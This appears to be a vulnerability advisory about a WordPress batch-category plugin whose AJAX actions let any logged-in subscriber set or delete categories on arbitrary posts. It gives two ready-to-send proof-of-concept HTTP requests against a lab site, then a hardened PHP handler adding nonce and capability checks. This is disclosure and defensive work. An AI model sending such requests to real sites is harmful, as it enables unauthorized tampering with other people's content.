The plugin defines 3 custom AJAX actions, all of which require authentication but are available to all roles. As a result, any authenticated user (including simple subscribers) can add, set or delete arbitrary categories on posts.
Set the category 107 to the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_set_category&post_ids=1537&cat_ids=107

Delete the category 107 from the post 1537:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wp.lab/wordpress/wp-admin/tools.php?page=batch-cat%2Fadmin.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://wp.lab
Connection: close
Cookie: [any authenticated user]

action=bcat_del_category&post_ids=1537&cat_ids=107
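The missing authorization check, sketched as a hardened handler for the bcat_set_category action. This is an added example, not the plugin's own code. Assumptions: the handler name `example_bcat_set_category`, the nonce action `example_bcat_nonce` and its `nonce` field are hypothetical, and `post_ids` / `cat_ids` are treated as comma-separated ID lists.

```php
<?php
// Added example: handler and nonce names are hypothetical, not the plugin's.
add_action( 'wp_ajax_bcat_set_category', 'example_bcat_set_category' );

function example_bcat_set_category() {
    // Reject requests without a valid nonce. Assumes the admin page emits
    // wp_create_nonce( 'example_bcat_nonce' ) in a field named "nonce".
    check_ajax_referer( 'example_bcat_nonce', 'nonce' );

    // Normalize both parameters to arrays of unique positive integers.
    $post_ids = wp_parse_id_list(
        isset( $_POST['post_ids'] ) ? wp_unslash( $_POST['post_ids'] ) : array()
    );
    $cat_ids = wp_parse_id_list(
        isset( $_POST['cat_ids'] ) ? wp_unslash( $_POST['cat_ids'] ) : array()
    );

    if ( empty( $post_ids ) || empty( $cat_ids ) ) {
        wp_send_json_error( array( 'message' => 'Missing post_ids or cat_ids.' ), 400 );
    }

    // Authorize every post before changing any of them: a subscriber has
    // no edit_post capability on other users' posts, so the request stops here.
    foreach ( $post_ids as $post_id ) {
        if ( ! current_user_can( 'edit_post', $post_id ) ) {
            wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
        }
    }

    // Only accept term IDs that exist in the category taxonomy.
    foreach ( $cat_ids as $cat_id ) {
        if ( ! term_exists( $cat_id, 'category' ) ) {
            wp_send_json_error( array( 'message' => 'Unknown category.' ), 400 );
        }
    }

    foreach ( $post_ids as $post_id ) {
        // Third argument false: replace the post's categories ("set").
        wp_set_post_categories( $post_id, $cat_ids, false );
    }

    wp_send_json_success( array( 'updated' => $post_ids ) );
}
```

The same nonce and per-post capability checks belong in the handlers for the other two actions.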